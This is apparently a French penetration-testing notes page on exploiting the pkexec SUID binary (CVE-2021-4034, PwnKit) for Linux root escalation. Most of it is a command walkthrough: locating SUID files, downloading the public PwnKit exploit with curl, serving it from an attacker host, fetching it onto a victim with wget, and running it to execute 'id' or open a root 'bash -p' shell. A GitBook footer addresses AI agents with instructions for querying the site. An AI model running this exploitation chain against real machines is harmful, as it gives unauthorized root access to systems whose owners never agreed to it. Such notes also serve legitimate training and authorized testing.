> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/privesc/suid/suid-pkexec-linux-privilege-escalation.md).

# SUID (Pkexec) - Élévation de privilèges Linux

## Ce que c’est

Les binaires SUID s’exécutent avec les privilèges de leur propriétaire, souvent root. Un binaire SUID vulnérable, obsolète ou trop flexible peut lire des fichiers protégés, ouvrir un shell avec privilèges élevés ou exécuter du code contrôlé par un attaquant. Cette page spécifique se concentre sur **SUID (Pkexec)** et maintient le flux d’exploitation pratique : identifiez la condition, validez-la en toute sécurité, puis exécutez la charge utile minimale nécessaire pour prouver l’impact.

## Énumération

Commencez par confirmer le contexte local et la mauvaise configuration exacte avant d’exécuter la voie d’exploitation.

```bash
find / -perm -4000 -type f 2>/dev/null
```

## Exemples

{% hint style="info" %}
Le **CVE-2021-4034** la vulnérabilité (PwnKit) dans **pkexec** de **polkit** permet une élévation locale de privilèges sous Linux. En utilisant une validation incorrecte des arguments, un attaquant peut exécuter du code avec des privilèges root. Cette faille critique, facilement exploitable, affecte de nombreuses distributions et nécessite une mise à jour urgente de polkit.
{% endhint %}

{% embed url="<https://github.com/ly4k/PwnKit>" %}

### Étapes pour exploiter le binaire SUID

**Identifier les fichiers avec le bit SUID activé**

Pour rechercher les fichiers avec le bit SUID (permettant l’exécution avec les privilèges du propriétaire, souvent `root`), utilisez la commande :

```bash
find / -perm -4000 2>/dev/null
```

Parmi les résultats, identifiez le binaire vulnérable **`pkexec`**.

<figure><img src="/files/22e2bf95462513d4b82c3f374532d28c987060ac" alt=""><figcaption></figcaption></figure>

## Exploitation de la vulnérabilité

**Télécharger l’exploit sur la machine attaquante**

Depuis la machine attaquante, téléchargez le script d’exploitation :

```bash
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
```

**Transférer l’exploit vers la machine victime**

Pour transférer l’exploit, lancez un simple serveur HTTP sur la machine attaquante :

```bash
python3 -m http.server 80
```

Sur la machine victime, téléchargez le fichier et accordez les permissions d’exécution :

```bash
wget http://10.10.10.10/PwnKit
```

```bash
chmod +x PwnKit
```

<figure><img src="/files/ec0ca59d542b58b3a776809aca63cfea545a942b" alt=""><figcaption></figcaption></figure>

Exécuter l’exploit

Une fois le fichier prêt, vous pouvez exécuter des commandes avec les privilèges root. Par exemple :

* Pour afficher l’identifiant utilisateur (`id`):

```bash
./PwnKit '<command>'
```

```bash
./PwnKit 'id'
```

<figure><img src="/files/871f00409737cf37e5bc9002e7479d4bb8dda758" alt=""><figcaption></figcaption></figure>

* Pour obtenir une session bash avec les privilèges root :

```bash
./PwnKit 'bash -p'
```

<figure><img src="/files/05c0800926fc28671fface9036aa41e545bb3f1b" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/privesc/suid/suid-pkexec-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
